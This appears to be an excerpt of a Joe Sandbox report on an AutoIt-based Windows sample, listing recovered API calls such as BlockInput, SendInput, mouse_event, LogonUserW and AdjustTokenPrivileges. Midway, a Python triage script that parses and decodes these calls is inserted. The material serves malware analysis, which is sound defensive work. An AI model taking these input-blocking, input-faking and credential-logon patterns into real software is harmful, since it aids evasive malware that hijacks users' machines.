• Opcode Fuzzy Hash: 981e0b9b3b1766ab6ee469eb8e590d44bb4e08970f9c0a825cfa4fc90aba33af
• Instruction Fuzzy Hash: 8F1191B1504209AFE718EF54DCD5D6BB7FDFB44714B20852EE556A7240DB70FC418A60
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F066AF
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00F066EC
• CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F066F5
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: 6ec0707c9b1dbc477f629b5512ec9fc06496e5d6aa251dd534108188dcaa80e6
• Instruction ID: 31d1bf859c31b1a8bcb2c325fa1dc429acef9ab12da99bb20ee1bb8cdcebd6d4
• Opcode Fuzzy Hash: 6ec0707c9b1dbc477f629b5512ec9fc06496e5d6aa251dd534108188dcaa80e6
• Instruction Fuzzy Hash: D41182B1901228BEE7118BA8DC45FAF77ACEB05754F104555FD01E71D0C2B4AA04A7A1
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F07223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F0723A
• FreeSid.ADVAPI32(?), ref: 00F0724A
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                                                                                                      • Opcode ID: 7b36595e0fcf18b1a4cbb91658ad29e4fbf40b6dc3a13aaeea3607a15248a858
                                                                                                                                                                                                                                                      • Instruction ID: d564fc6c036970708f6d9f704be949216ceb3dc0b7aefbfa36827558811cec5a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b36595e0fcf18b1a4cbb91658ad29e4fbf40b6dc3a13aaeea3607a15248a858
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87F01279D0430DBFDF04DFE8DD89AEDBBB8EF09201F104469A502E3191E27056449B10
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F0F599
• FindClose.KERNEL32(00000000), ref: 00F0F5C9
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 19942985dda28d8a97b33e20c6a0421482676ab2eeb0f803c79d015eb1f121d3
• Instruction ID: 261b9c209bf5769b00cbebee10ef033bea98f3d57c12cc91ed3b622217c03959
• Opcode Fuzzy Hash: 19942985dda28d8a97b33e20c6a0421482676ab2eeb0f803c79d015eb1f121d3
• Instruction Fuzzy Hash: E111C0326002049FD710EF28D849A2EF3E9FF95324F04891EF9AAD7391DB30AD059B81
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F1BE6A,?,?,00000000,?), ref: 00F0CEA7
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F1BE6A,?,?,00000000,?), ref: 00F0CEB9
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: c533e7b21bc7144553eb2e6188131b511abc3641e6b27f6d091533d5c347984f
• Instruction ID: 9c02ae42a8ad6db45c9947683ee1ea0b9afa8bd73731d39317b814526766abb1
• Opcode Fuzzy Hash: c533e7b21bc7144553eb2e6188131b511abc3641e6b27f6d091533d5c347984f
• Instruction Fuzzy Hash: 15F0823550022DEBDB109FA4DC49FFB776DBF09361F004165F919D6191D6709A40DBA1
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F04153
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00F04166
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 40c72eeabe1689d6426ccfa1a1414d68b018afdb29730c053cfb4744d9d1eb86
• Instruction ID: 8981b8a83b70eab2bb4f86723774a7b082d60487c966bda0767f3ec678802f4f
• Opcode Fuzzy Hash: 40c72eeabe1689d6426ccfa1a1414d68b018afdb29730c053cfb4744d9d1eb86
• Instruction Fuzzy Hash: 6DF0677490424DAFDB068FA0C805BBE7BB0EF10305F04800AF966A61A2D7799612AFA0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EFACC0), ref: 00EFAB99
• CloseHandle.KERNEL32(?,?,00EFACC0), ref: 00EFABAB
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: ad0690b3815473c39ad60e0902313314969ca31a0ed0c0024575fe71a3cefadb
• Instruction ID: 08a4a551c0b017dedd53bf5bc70b7f9b71bf2e6d7bad97fdc3dd7db1137f8ebb
• Opcode Fuzzy Hash: ad0690b3815473c39ad60e0902313314969ca31a0ed0c0024575fe71a3cefadb
• Instruction Fuzzy Hash: 40E0E675000510AFE7256F54FC09D7777E9EF043217108429F95A91574D7626C91DB50
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00EE6DB3,-0000031A,?,?,00000001), ref: 00EE81B1
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EE81BA
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
Strings
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID: @
• API String ID: 3728558374-2766056989
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: ee8571d64ab721c99f28c2364bfbde3ac48e19443c63dce9a2f686922cc77c9b
                                                                                                                                                                                                                                                      • Instruction ID: 318aa3072a15e0212ca69a3b68c7d48b6887c3d3f06a0576ac541fa16842d165
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee8571d64ab721c99f28c2364bfbde3ac48e19443c63dce9a2f686922cc77c9b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57B11120D2AF454DD22396388831337B65CAFBB6D6F92D71BFD2B74D62EB2181835180
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __time64.LIBCMT ref: 00F0B6DF
                                                                                                                                                                                                                                                        • Part of subcall function 00EE344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F0BDC3,00000000,?,?,?,?,00F0BF70,00000000,?), ref: 00EE3453
                                                                                                                                                                                                                                                        • Part of subcall function 00EE344A: __aulldiv.LIBCMT ref: 00EE3473
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
• Opcode ID: 28965d7d9d5ea0927e7a0a12a52bc5390c5d9a078d78658b2b6825129b0b9da8
• Instruction ID: 48281c7e77408cbd06b45d8ff82d68938d719bb7137bf64da670acfe4ce5ac1e
• Opcode Fuzzy Hash: 28965d7d9d5ea0927e7a0a12a52bc5390c5d9a078d78658b2b6825129b0b9da8
• Instruction Fuzzy Hash: A221B472634510CBC729CF38C881A96B7E1EB95720B248E7DE4E5CB2D0CB74B905EB54
APIs
• BlockInput.USER32(00000001), ref: 00F16ACA
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: f7f7720c46e3942b6b4122542c9c34f4e1e8acc90d90316dfc968b28d4e54180
• Instruction ID: 83716bf50cd3078383e5c7aa7c731e2456a1722c25e8a5d433650869aa60ff5d
• Opcode Fuzzy Hash: f7f7720c46e3942b6b4122542c9c34f4e1e8acc90d90316dfc968b28d4e54180
• Instruction Fuzzy Hash: D5E012362102046FC700EB99D904E96B7ECAFB4761B05842AE945D7251DAB5E8449B90
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00F0750A
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 707425740fa6a675dd5ddb0698e6a8718fcfcdb51c3e9c5f55927bf565df75a4
• Instruction ID: d8e0c2ecfd7ad7969b6f9f91d69e79dfedee0b7d0c3433f1fc305036a0996607
• Opcode Fuzzy Hash: 707425740fa6a675dd5ddb0698e6a8718fcfcdb51c3e9c5f55927bf565df75a4
• Instruction Fuzzy Hash: BED092A9E6C749B9EC29A7249C1FFF72A08F3017A1FD845C9B603D90C0A8E47D01B071
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EFAD3E), ref: 00EFB124
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: ed87a7666999a3aaae99fc15df4acd20ef29c961ec27c1202701765c589f488c
• Instruction ID: 8c2ed103e05d066ecde6b59726ee84da3e28f83755d9f66a204562e6d3abfa40
• Opcode Fuzzy Hash: ed87a7666999a3aaae99fc15df4acd20ef29c961ec27c1202701765c589f488c
• Instruction Fuzzy Hash: 7BD05E321A460EAEDF024FA4DC02EAE3F6AEB04700F408110FA11C60A0C671D531AB50
APIs
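As an added example (not part of the Joe Sandbox report or its IDA plugin output), the script below parses the `APIs` bullet lines in the shape shown in the entries above, keeps direct calls apart from `Part of subcall function` entries, and decodes the arguments a reviewer would otherwise look up by hand: the `fBlockIt` parameter of `BlockInput` and the `MOUSEEVENTF_*` bits of `mouse_event`. The sample lines are copied from the entries above and embedded inline as constructed test input; the `TRIAGE` notes, the function names and the `?` handling for arguments the sandbox could not recover are this example's own assumptions, not report fields. The `LogonUserW` arguments are carried through as recovered and are not decoded.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input for this example: the bullet lines are copied from
# the report entries above so the parser is exercised on the real line shapes.
SAMPLE_ENTRIES = """\
APIs
• __time64.LIBCMT ref: 00F0B6DF
  • Part of subcall function 00EE344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F0BDC3,00000000,?,?,?,?,00F0BF70,00000000,?), ref: 00EE3453
  • Part of subcall function 00EE344A: __aulldiv.LIBCMT ref: 00EE3473
APIs
• BlockInput.USER32(00000001), ref: 00F16ACA
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00F0750A
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EFAD3E), ref: 00EFB124
"""

# One bullet: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, optional "(args)", optional comma, then "ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                # hex values, or "?" where the sandbox recovered nothing
    ref: str                       # call-site address in the dump
    subcall: Optional[str] = None  # callee address when the API is reached indirectly

def parse_api_entries(text: str) -> List[List[ApiCall]]:
    """Group the bullet lines under each 'APIs' header, one list per function."""
    entries: List[List[ApiCall]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
            continue
        m = API_RE.match(line)
        if not m:
            continue  # hashes, dump metadata and other non-API lines are skipped
        if not entries:
            entries.append([])
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        entries[-1].append(ApiCall(m.group("name"), m.group("module"), args,
                                   m.group("ref").upper(), m.group("sub")))
    return entries

# dwFlags bits of mouse_event, from winuser.h.
MOUSEEVENTF = {
    0x0001: "MOUSEEVENTF_MOVE", 0x0002: "MOUSEEVENTF_LEFTDOWN",
    0x0004: "MOUSEEVENTF_LEFTUP", 0x0008: "MOUSEEVENTF_RIGHTDOWN",
    0x0010: "MOUSEEVENTF_RIGHTUP", 0x0020: "MOUSEEVENTF_MIDDLEDOWN",
    0x0040: "MOUSEEVENTF_MIDDLEUP", 0x0800: "MOUSEEVENTF_WHEEL",
    0x8000: "MOUSEEVENTF_ABSOLUTE",
}

def decode_mouse_event_flags(flags: int) -> List[str]:
    return [name for bit, name in sorted(MOUSEEVENTF.items()) if flags & bit]

def _hex(arg: str) -> Optional[int]:
    """Recovered argument as an int, or None for the sandbox's '?' placeholder."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None

# Why each API is worth a look during triage (this example's own notes, assumed).
TRIAGE: Dict[str, str] = {
    "BlockInput": "blocks keyboard and mouse input; hinders an interactive debugger",
    "LogonUserW": "logs a user on with a username and password; credential use",
    "mouse_event": "synthesizes mouse input",
    "GetSystemTimeAsFileTime": "timestamp source; also the basis of timing-based debugger checks",
}

def flag_calls(entries: List[List[ApiCall]]) -> List[Tuple[int, ApiCall, str]]:
    """Return (function index, call, note) for each call in TRIAGE, decoding
    the arguments a reviewer would otherwise look up by hand."""
    out: List[Tuple[int, ApiCall, str]] = []
    for i, calls in enumerate(entries):
        for c in calls:
            if c.name not in TRIAGE:
                continue
            note = TRIAGE[c.name]
            first = _hex(c.args[0]) if c.args else None
            if c.name == "BlockInput" and first is not None:
                note += "; fBlockIt=" + ("TRUE" if first else "FALSE")
            elif c.name == "mouse_event" and first is not None:
                note += "; dwFlags=" + "|".join(decode_mouse_event_flags(first))
            out.append((i, c, note))
    return out

if __name__ == "__main__":
    for i, c, note in flag_calls(parse_api_entries(SAMPLE_ENTRIES)):
        where = f"via callee {c.subcall}" if c.subcall else f"ref {c.ref}"
        print(f"fn#{i} {c.name}.{c.module} ({where}): {note}")
```

Run against the four entries above it reports `BlockInput` with `fBlockIt=TRUE` and `mouse_event` with `dwFlags=MOUSEEVENTF_LEFTUP`; a `?` argument is left undecoded rather than guessed, which matters for the `LogonUserW` line where the username, domain and password pointers were not recovered.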
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EE818F
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction ID: 14f935f7d44ee054c3379d828e6c171f1751d03394900a703499e9ed4e667ba4
• Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction Fuzzy Hash: A2C10A322051E70ADF2D863AD43043EFBA19E917B931A276ED8B3DB5D1EF60C564D620
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction ID: 443ef35ffcc459ffc036aa918215926a08ffe182bfecddcffffa115e8e09aac7
• Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction Fuzzy Hash: 7AC10A322051E709DF1D863AD43443EFBA19E927B931A276ED8B3EB1D5EF20C564D610
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: 2c1ecab7a10760d61b8158d5ac136d15ccd7d12b7e34c2dffdb3dd4085039be1
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: D1C1A2322050A309DF2DC639943053EBBA19A917B931A277FD8B3DB6D5EF20C566D620
APIs
• DeleteObject.GDI32(00000000), ref: 00F1A2FE
• DeleteObject.GDI32(00000000), ref: 00F1A310
• DestroyWindow.USER32 ref: 00F1A31E
• GetDesktopWindow.USER32 ref: 00F1A338
• GetWindowRect.USER32(00000000), ref: 00F1A33F
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F1A480
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F1A490
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A4D8
• GetClientRect.USER32(00000000,?), ref: 00F1A4E4
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F1A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A55E
• GlobalLock.KERNEL32(00000000), ref: 00F1A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A576
• GlobalUnlock.KERNEL32(00000000), ref: 00F1A57F
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A586
• GlobalFree.KERNEL32(00000000), ref: 00F1A591
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F4D9BC,00000000), ref: 00F1A5B9
• GlobalFree.KERNEL32(00000000), ref: 00F1A5C9
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F1A5EF
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F1A60E
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A630
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A81D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: 77340870c56b2420364add5091724ad0a80412eb3ae08f4c69c3a6c19cc5fe1f
• Instruction ID: 5ebb9ed2b70788b21e96c3e50b5b965115f27645c876ed732cebfb91ca703d7a
• Opcode Fuzzy Hash: 77340870c56b2420364add5091724ad0a80412eb3ae08f4c69c3a6c19cc5fe1f
• Instruction Fuzzy Hash: 27027C75900208EFDB14DFA4CD89EAE7BB9FB49310F108158F915AB2A1C771ED41EB61
